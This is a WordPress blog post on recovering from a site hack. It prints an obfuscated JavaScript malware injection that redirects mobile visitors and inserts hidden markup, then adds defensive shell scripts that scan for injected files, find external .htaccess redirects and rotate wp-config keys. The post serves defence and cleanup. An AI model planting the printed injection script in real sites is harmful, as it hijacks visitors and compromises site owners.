17 Steps to Take if Your WordPress Site Gets Hacked


Website hacks are getting more frequent. They can have many purposes and targets, and the goal isn't always clear, but one thing holds true: it's a dark and unpleasant experience. Sometimes your site gets hacked and redirected to a porn site. Sometimes code gets injected into PHP or JavaScript files. We don't always know our site has been compromised, and sometimes we only find out when a visitor tells us. The message usually reads something like "this site may be hacked" or "this site contains malware".

When users visit a site, they will see the Google Red Screen of Death mentioning “this site may be hacked”:

[Image: Google's "this site may be hacked" security warning]

Then they tell you about it and this is how you find out…

The whole experience is coloured by feelings of devastation and hopelessness. You wonder why you ever decided to have a website in the first place.

Hacks vary in severity. Some are malicious and some are comparatively benign, designed only to collect data. Whatever the case, there are certain steps to follow if you think your site has been hacked.

They range from malware injected into multiple site files, looking like the code below, to full-scale DDoS attacks.

Here’s an example of a malware injection:

Malware Code Example

/*2ad1c84e2d1ce12e0f0df4a27da38d61*/function YSrOnCNixMIcdVMlajhIMKrzneKKHJF(){var e="none";if("none"!=e){var n=document.getElementById(e);void 0!=typeof n&&null!=n&&(n.outerHTML="",delete n)}}function CilbNlDaKuEoWmggYrZofsdShwgdPkMSfyWU(){return document.all&&!document.compatMode?!0:document.all&&!window.?!0:document.all&&!document.querySelector?!0:document.all&&!document.addEventListener?!0:document.all&&!window.atob?!0:document.all?!0:"undefined"!=typeof navigator.maxTouchPoints&&!document.all&&RKROQWbhWWUGgzKLxaqzFkDgCUTTzKsFYDIg()?!0:!1}function RKROQWbhWWUGgzKLxaqzFkDgCUTTzKsFYDIg(){var e=window.navigator.userAgent,n=e.indexOf("MSIE ");if(n>0)return parseInt(e.substring(n+5,e.indexOf(".",n)),10);var o=e.indexOf("Trident/");if(o>0){var i=e.indexOf("rv:");return parseInt(e.substring(i+3,e.indexOf(".",i)),10)}var t=e.indexOf("Edge/");return t>0?parseInt(e.substring(t+5,e.indexOf(".",t)),10):!1}function EjnDzygFuVfOgIDbCfceUmuybGJGKErwxg(){var e=window.navigator.userAgent.toLowerCase();return/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(e)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(e.substr(0,4))?!0:!1}var ywrPsowJfVnLJFhKPFaUPHeduUazYnEuBcrdV=setInterval(function(){if(null!=document.body&&"undefined"!=typeof document.body){if(clearInterval(ywrPsowJfVnLJFhKPFaUPHeduUazYnEuBcrdV),"undefined"==typeof window.v_2ad1c84e2d1ce12e0f0df4a27da38d61){window.v_2ad1c84e2d1ce12e0f0df4a27da38d61=1;var e=RKROQWbhWWUGgzKLxaqzFkDgCUTTzKsFYDIg()&&CilbNlDaKuEoWmggYrZofsdShwgdPkMSfyWU(),n=!e&&!!window.chrome&&"Google Inc."===window.navigator.vendor,o=-1,i="http://SOMEWEBSITEGOESHERE";if(EjnDzygFuVfOgIDbCfceUmuybGJGKErwxg()&&1==o)navigator.userAgent.match(/iPhone/i)||navigator.userAgent.match(/iPod/i)?location.replace(i):(window.location=i,document.location=i);else if(e&&!n&&!EjnDzygFuVfOgIDbCfceUmuybGJGKErwxg()){var t='<div style="position:absolute;left:-3532px;"> </div>',a=document.getElementsByTagName("div");if(0==a.length)document.body.innerHTML=document.body.innerHTML+t;else{var r=a.length,d=Math.floor(r/2);a[d].innerHTML=a[d].innerHTML+t}}}YSrOnCNixMIcdVMlajhIMKrzneKKHJF()}},100);/*2ad1c84e2d1ce12e0f0df4a27da38d61*

In either case, getting hacked is not a fun experience, but keep in mind that this isn't the end of the world, nor the end of your website. Everything will be fine, and most, if not all, of your site will be recovered in the process.

Below I’ll outline some steps you can take to recover from the hack and mitigate the damage.


17 Steps to Take if Your WordPress Site is Hacked

1. Stay Cool, Calm and Collected

This is not a time to panic. You are probably under a lot of stress and anxiety. The most important thing right now is to stay calm so you can focus on how to handle the situation and mitigate as much of the damage as possible.

Yes, you may lose some traffic, some money and some uptime, but you won’t lose your site. Most likely, you’ll be able to recover from this completely intact.

Take a deep breath and look at this objectively. Remove yourself from the equation so you can focus.

2. Retrace Your Last Steps

What is the most recent change that you, or somebody with access to your site, made? Ask around. Did you upload a plugin from an unidentified author? Did somebody have a weak password? Do you have a mailing app installed on your site?

Who was the last person who had access to your site? If it was you, try to see what that activity looked like.

3. Browse the Internet for Vulnerabilities

Do any of the themes and plugins currently installed on your site have known vulnerabilities? Check every outdated theme and plugin that needs an update to see whether a vulnerability has been published for it. Google is your friend here.

Even if all your themes and plugins are up to date, check whether any installed plugin has a known vulnerability. You'll be surprised how many plugins and themes have reported vulnerabilities. It's important to identify the problem theme or plugin if there is one; then you know where to start looking when you go through the files in your FTP client.

4. Delete and Replace All the Core WordPress Files

If your core files are compromised, the best way to mitigate that is to replace all the core files with a fresh WordPress install. Don't just copy the new files over the old ones: delete the core files first, then put the fresh install in their place. You can replace all the core files without losing any of your content.

If a file lives in a core directory but isn't a core file, simply copying the fresh files over the top will not touch it, because there is nothing in the fresh install to overwrite it with. You would have to find that file and delete it manually. That is why it's important to delete the core WordPress install first and then replace the files.
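The point about leftover files is easy to check mechanically. The script below is an added example, not code from the original post: it compares a live WordPress tree against a fresh, unmodified copy of the same release and lists files that exist only in the live tree (which an upload-over-the-top replacement would never remove) as well as shipped files whose contents differ. The directory layout and file contents it builds are constructed for the demonstration; in real use you would point it at your site's document root and at a freshly extracted WordPress archive of the same version.

```shell
#!/bin/sh
# Added example, not from the original post: compare a live WordPress tree
# with a fresh copy of the same release. wp-content/ (themes, plugins, uploads)
# and wp-config.php are site-specific and are skipped; everything else should
# match the fresh copy byte for byte.

# extra_files LIVE FRESH: files present in LIVE that the fresh release does
# not ship. Copying a fresh install over the top never removes these, which
# is why the post says delete first, then replace.
extra_files() {
  (cd "$1" && find . -type f ! -path './wp-content/*' ! -name wp-config.php | sort) |
  while IFS= read -r f; do
    [ -e "$2/$f" ] || printf '%s\n' "$f"
  done
}

# modified_files LIVE FRESH: shipped files whose contents differ from the
# fresh copy (a likely sign of injected code).
modified_files() {
  (cd "$2" && find . -type f ! -path './wp-content/*' | sort) |
  while IFS= read -r f; do
    if [ -e "$1/$f" ] && ! cmp -s "$1/$f" "$2/$f"; then printf '%s\n' "$f"; fi
  done
}

# --- constructed demonstration data (not a real site) ---
DEMO=$(mktemp -d)
FRESH_DIR="$DEMO/wordpress-fresh"   # stands in for a freshly extracted release
LIVE_DIR="$DEMO/public_html"        # stands in for the hacked site's document root
mkdir -p "$FRESH_DIR/wp-includes" "$FRESH_DIR/wp-admin" \
         "$LIVE_DIR/wp-includes" "$LIVE_DIR/wp-admin" "$LIVE_DIR/wp-content/uploads"
printf '<?php // clean core file\n' > "$FRESH_DIR/index.php"
printf '<?php // clean core file\n' > "$FRESH_DIR/wp-includes/functions.php"
cp "$FRESH_DIR/index.php" "$LIVE_DIR/index.php"                                  # untouched
printf '<?php // clean core file\n// injected line\n' > "$LIVE_DIR/wp-includes/functions.php"  # tampered
printf '<?php // not part of any release\n' > "$LIVE_DIR/wp-admin/wp-up.php"      # dropped extra file
printf "define('DB_NAME', 'wp_demo');\n" > "$LIVE_DIR/wp-config.php"             # site-specific, skipped
: > "$LIVE_DIR/wp-content/uploads/photo.jpg"                                      # wp-content is skipped

echo "Files not shipped by the release (must be deleted by hand):"
extra_files "$LIVE_DIR" "$FRESH_DIR"
echo "Core files that differ from the fresh copy:"
modified_files "$LIVE_DIR" "$FRESH_DIR"
```

Anything the first list shows is exactly what a copy-over replacement leaves behind; anything in the second list is a core file you should not trust, whatever it looks like when opened.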

5. Delete and Replace All the Theme Files

You likely downloaded your theme from somewhere or someone. Delete and replace that theme just as you did the core WordPress files; everything said above about the core installation applies here too.

6. Replace All Your Plugin Files

Got a lot of plugins? Well, this could be the cause of your stress: a plugin vulnerability may be how you got hacked. Either way, delete all your plugins and replace them with fresh installations. Don't worry about your configurations; those are stored in the database. The same caveats as above apply.

7. Contact Your Host for a Malware Scan

Contact your host immediately after a hack so they can start a malware scan and begin determining how much damage there is and where it is coming from.

Your host can run a full server scan to see whether any extraneous, non-WordPress files are the culprit. This scan can take some time, but it's definitely worth doing.

8. Install a Security Plugin and Start a Scan

I recommend using a security plugin called Sucuri. Sucuri scans your whole WordPress file structure to determine whether there is malware in any of the files. If it finds potentially bad files, you may have to replace those files or manually delete the malicious code from them.

A lot of the time the malicious code is repeated verbatim across many files and is easy to recognise, like the example I showed earlier. Sometimes it's not in the WordPress files at all but in the Apache configuration.

9. Check Your .htaccess File for Redirects

Often, redirects and minor site modifications are made in the .htaccess file. Open it and look for any redirect rules: the sites you keep being sent to will appear in this file. Delete that bit and you should be back to normal.
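As an added example for steps 8 and 9 (not the author's code, and not a substitute for a Sucuri or host scan), the shell functions below automate the two manual checks: one lists files carrying the /*<32 hex characters>*/ comment markers that wrap the injected block shown earlier, the other prints .htaccess lines that redirect or rewrite to an external URL. The sample tree and .htaccess they scan are constructed; the marker pattern is a heuristic taken from the example above, not a complete malware signature.

```shell
#!/bin/sh
# Added example, not from the original post. Two quick checks that can be run
# over a downloaded copy of the site or on the server alongside a proper scan.

# marked_injections DIR: files under DIR whose contents contain a block wrapped
# in /*<32 hex chars>*/ markers, the pattern the injected script above uses.
# This is a narrow heuristic, not a substitute for a real malware scanner.
marked_injections() {
  find "$1" -type f \( -name '*.js' -o -name '*.php' -o -name '*.html' \) \
    -exec grep -lE '/\*[0-9a-f]{32}\*/' {} + 2>/dev/null | sort
}

# htaccess_redirects FILE: Redirect* and RewriteRule lines in FILE whose target
# is an absolute http(s) URL, printed with line numbers so they can be removed.
# A stock WordPress .htaccess only rewrites to the local /index.php.
htaccess_redirects() {
  grep -nE '^[[:space:]]*(Redirect[A-Za-z]*|RewriteRule)[[:space:]].*https?://' "$1" || true
}

# --- constructed demonstration data (not a real site) ---
DEMO=$(mktemp -d)
mkdir -p "$DEMO/wp-includes/js" "$DEMO/wp-content/themes/demo"
printf 'function clean(){return 1;}\n' > "$DEMO/wp-includes/js/clean.js"
printf '<?php get_footer(); ?>\n/*0123456789abcdef0123456789abcdef*/var x=1;/*0123456789abcdef0123456789abcdef*/\n' \
  > "$DEMO/wp-content/themes/demo/footer.php"
HTACCESS="$DEMO/.htaccess"
printf '%s\n' \
  '# BEGIN WordPress' \
  'RewriteEngine On' \
  'RewriteBase /' \
  'RewriteRule ^(.*)$ http://example.invalid/landing [R=302,L]' \
  'RewriteRule ^index\.php$ - [L]' \
  'RewriteCond %{REQUEST_FILENAME} !-f' \
  'RewriteRule . /index.php [L]' \
  '# END WordPress' > "$HTACCESS"

echo "Files carrying hex-hash comment markers:"
marked_injections "$DEMO"
echo "External redirects in .htaccess:"
htaccess_redirects "$HTACCESS"
```

Treat both outputs as a starting point for manual review: a file that matches the marker pattern is worth opening, and any .htaccess rule pointing at a host you don't own is worth removing, but a clean result from these two checks proves nothing on its own.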

10. Check The Google Blacklist

If you’re seeing the Google Red Screen of Death saying

The site ahead contains malware

then most likely you are already blacklisted. That doesn't mean you can't be removed from the blacklist, though. To run a blacklist check I recommend using a dedicated tool; it will tell you whether your particular site is indeed blacklisted by Google.

11. Change ALL Your Passwords

Yes, that means all. Start by changing your WordPress passwords and then every other access point to your site: cPanel, WHM, your hosting login, WordPress, and so on. Change all your passwords immediately so that no other attackers can get in through the easiest route.

Use a secure password generator to do this.

12. Kick Everyone Else Out of Your WordPress Site

When someone logs into your site, WordPress sets authentication cookies in their browser that are signed with the keys and salts in wp-config.php, so they stay logged in until those cookies expire. Changing the keys invalidates every existing cookie at once. This matters especially if the hacker created a new user for themselves as a backdoor.

To do this, edit the keys in your wp-config.php file. You will need FTP (or your host's file manager) to reach it. Locate wp-config.php and replace the keys and salts with a new set.
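An added example (not the post's own code) of this step as a script: it rotates the eight key and salt defines in wp-config.php with fresh random values, which is what invalidates every existing login cookie. The wp-config.php it edits is a constructed minimal one; the script assumes the standard define('NAME', 'value'); form that WordPress uses for these settings, keeps a .bak copy of the original, and needs /dev/urandom, base64 and sed (GNU or BSD).

```shell
#!/bin/sh
# Added example, not from the original post: rotate the authentication keys and
# salts in wp-config.php. WordPress signs login cookies with these values, so
# replacing them logs out every browser, including any the attacker holds.

WP_KEYS="AUTH_KEY SECURE_AUTH_KEY LOGGED_IN_KEY NONCE_KEY AUTH_SALT SECURE_AUTH_SALT LOGGED_IN_SALT NONCE_SALT"

# new_secret: 48 random bytes as 64 base64 characters. The base64 alphabet has
# no quote, backslash, ampersand or '|', so the value is safe inside the PHP
# string literal and inside the sed replacement below.
new_secret() {
  head -c 48 /dev/urandom | base64 | tr -d '\n'
}

# key_value FILE NAME: current value of define('NAME', '...') in FILE
key_value() {
  sed -nE "s|^define\( *'$2', *'([^']*)'.*|\1|p" "$1"
}

# rotate_wp_keys FILE: keep FILE.bak, then give every key a fresh value.
# Assumes the define('NAME', 'value'); form WordPress generates.
rotate_wp_keys() {
  cp "$1" "$1.bak"
  for k in $WP_KEYS; do
    s=$(new_secret)
    sed -i.tmp -E "s|^(define\( *'$k', *)'[^']*'|\1'$s'|" "$1"
  done
  rm -f "$1.tmp"
}

# --- constructed demonstration config (not a real site's) ---
DEMO=$(mktemp -d)
WP_CONFIG="$DEMO/wp-config.php"
{
  echo "<?php"
  echo "define('DB_NAME', 'wp_demo');"
  for k in $WP_KEYS; do echo "define('$k', 'put your unique phrase here');"; done
} > "$WP_CONFIG"

rotate_wp_keys "$WP_CONFIG"
echo "AUTH_KEY is now: $(key_value "$WP_CONFIG" AUTH_KEY)"
```

Run it against the real wp-config.php only after you have a copy of the file elsewhere, and delete the .bak once you have confirmed the site still loads; the old values in it would let anyone who reads it forge cookies that the site no longer accepts, but there is no reason to leave them around.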

13. Delete Any Unauthorized Users

Navigate over to Users and see if you have any weirdos hanging around there. If there is an unfamiliar name in there, delete it immediately. Don’t let users loiter on your site. Get rid of the ones you are unaware of.

14. Log Out of Your Account Everywhere else

Maybe you left yourself logged in somewhere else, on a public device, or you lost your phone. Perhaps the hacker is even using your login details. Whatever the case, make sure that only you are logged into the site, with a brand new password.

To do this, navigate to Users -> Your Profile and scroll down to the button that says Log Out Everywhere Else. Click it and all other sessions will be terminated.

[Screenshot: Profile - WP Soar - WordPress]

15. Restore Your Most Recent Backup

Tell me you have a backup. Please tell me you at least backed up your work. Assuming you do, restore the most recent backup that you know predates the problem. The most important part of the backup here is the files, since those are what contain the malicious code.

You can simply FTP all the backed-up files over and keep your existing database, once you've deleted any unauthorized users and changed all your passwords.

16. Let the Community Know

Send a Twitter blast to your clients. Let the folks who have your email know via an email blast. Post a comment on your Facebook page. Notify your LinkedIn community. This will at least let people know that something is not right, and they will perhaps be more forgiving towards your situation. This is especially true if you start sending them thousands of porn emails (true story, ask me in the comments) that were completely unintentional and weren't your fault.

Once you let people know about your situation, they will likely be more compassionate about your issue. If somebody with experience hears about this, perhaps they can help you out.

17. None of This Worked…Start Fresh

When all else fails, it may be too late for some things. There is still hope of recovering most of your content, but perhaps not much of your core files. You may have to get a new theme or some new plugins. Maybe it's time to start from a completely fresh installation of WordPress and hack apart your database to extract all the content manually.

It's not a pretty process, but it's doable. Your database stores all of your content, so at the very least you can keep all of that. You may have to backtrack and re-upload all your images, reconfigure some settings, or just build a brand new look for your web presence.

You may need to download your whole database from phpMyAdmin (ask your host) and open it in a code editor. Find the posts table and copy the whole darn thing to restore all your content; it's stored as HTML. Trust me, it's all there. You didn't lose anything unless your whole database got deleted, in which case your site would be gone too. Well, it could just be back to the default settings, theme and plugins, but you know what I mean.

Alternatively, you can download just the posts table, but that may miss some details, like comments.

Whatever the case, this is still not the end of your site. Your wp-content/uploads folder is likely not compromised; if it is, just download the whole thing and take out all the images. Replicate the file structure and re-upload it. This way your database can still reference the same images and content it referenced before.

Effectively, you’re just piecing your site together with the resources that you still have available. This is akin to a manual backup from scratch, if that makes sense.

For the new site make sure you follow the standard WordPress security strategies so that this doesn’t happen again.

What’s your experience with hackers? Have you ever been hacked? How did you solve it? Please comment below.

Yury Vilk

About

Yury is a web entrepreneur, owner and founder of WP Soar. His expertise is in WordPress, Internet Marketing, and PPC. He has been working on the web since 2006 helping businesses achieve their online goals.
  • I appreciate Yury Vilk for your great job done. I would like to add a few more points to your post and also a list of tips you can find here: http://bit.ly/1WHHImk

    • WP Soar

      Markus,

      Thank you for your comment! I really appreciate it! Great infographic! Please subscribe and get the 27 Golden Laws of On Page SEO. (Look to your right)